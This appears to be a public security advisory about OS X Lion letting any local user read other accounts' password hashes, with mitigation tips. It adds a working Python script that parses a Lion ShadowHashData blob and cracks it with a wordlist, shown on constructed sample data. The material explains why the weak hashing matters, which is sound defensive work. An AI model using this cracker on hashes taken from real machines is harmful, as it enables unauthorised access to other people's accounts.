PSA: Cracking Passwords in Lion is Far Too Simple

Defence in Depth has found a serious security flaw in OS X 10.7 Lion: non-admin users can read other users' password hash data from Directory Services, and those hashes can be trivially cracked. In short, anyone with local access to a Lion machine can pull the hash for your account and attack it offline. Worse, the currently logged-in user's password can be reset with a one-line command. That requires the attacker to have local or remote (SSH) access to a machine the user is already logged into, but unlike most damaging commands, it never prompts for the existing password. Step away from an unlocked laptop for a quick trip to the bathroom and you may return to a compromised machine. Whether Apple is working on a fix is unknown; until one ships, lock your screen whenever you step away, keep Remote Login disabled unless you need it, and be aware of the issue.

This ShadowHashData attribute actually contains the same hash stored in user bob’s shadow .plist file. The interesting thing about this? root privileges are not required. All users on the system, regardless of privilege, have the ability to access the ShadowHashData attribute from any other user’s profile.

[Defence in Depth]
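To make the "trivially cracked" part concrete, here is an added example (not code from the original post or from Defence in Depth) that parses a ShadowHashData blob and runs a wordlist attack against it. It assumes the format Lion 10.7 used for that attribute: a binary plist whose SALTED-SHA512 entry is 68 bytes, a 4-byte salt followed by a single SHA-512 of salt || password. The sample blob, salt, password and wordlist are constructed here so the script runs offline; the helper names are this example's own.

```python
import hashlib
import plistlib

# Constructed sample inputs (not real account data): a known password and a
# fixed salt, used to build a ShadowHashData blob in the assumed Lion format.
SAMPLE_SALT = bytes.fromhex("deadbeef")
SAMPLE_PASSWORD = "hunter2"
WORDLIST = ["password", "letmein", "hunter2", "qwerty"]  # constructed


def make_shadow_hash_data(password: str, salt: bytes) -> bytes:
    """Build a Lion-style ShadowHashData binary plist from a known password.

    Assumed layout: {"SALTED-SHA512": salt(4) || SHA-512(salt || password)}.
    Used only to fabricate test input; on a real system the blob comes from
    the user's directory record.
    """
    digest = hashlib.sha512(salt + password.encode("utf-8")).digest()
    return plistlib.dumps({"SALTED-SHA512": salt + digest},
                          fmt=plistlib.FMT_BINARY)


def from_hex_dump(text: str) -> bytes:
    """Turn a hex rendering of the attribute (e.g. copied from a tool that
    prints binary attributes as hex bytes) back into the raw plist bytes."""
    return bytes.fromhex("".join(text.split()))


def parse_shadow_hash_data(blob: bytes):
    """Return (salt, digest) from a ShadowHashData binary plist, rejecting
    entries that are not the expected 4 + 64 bytes."""
    entry = plistlib.loads(blob)["SALTED-SHA512"]
    if len(entry) != 68:
        raise ValueError("unexpected SALTED-SHA512 length %d" % len(entry))
    return entry[:4], entry[4:]


def crack(salt: bytes, digest: bytes, wordlist):
    """Wordlist attack. Lion applies one unstretched SHA-512 per password, so
    each candidate costs a single hash call; that is why this is so cheap
    compared with an iterated scheme such as PBKDF2."""
    for candidate in wordlist:
        if hashlib.sha512(salt + candidate.encode("utf-8")).digest() == digest:
            return candidate
    return None


def demo():
    """Round trip: build a blob, parse it, recover the password."""
    blob = make_shadow_hash_data(SAMPLE_PASSWORD, SAMPLE_SALT)
    salt, digest = parse_shadow_hash_data(from_hex_dump(blob.hex()))
    return crack(salt, digest, WORDLIST)


if __name__ == "__main__":
    print(demo())  # → hunter2
```

The point to take from the timing is that nothing in this scheme slows an attacker down: a four-byte salt only prevents precomputed tables, and a single SHA-512 means a commodity machine tries millions of candidates per second, so any password in a common wordlist falls immediately.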
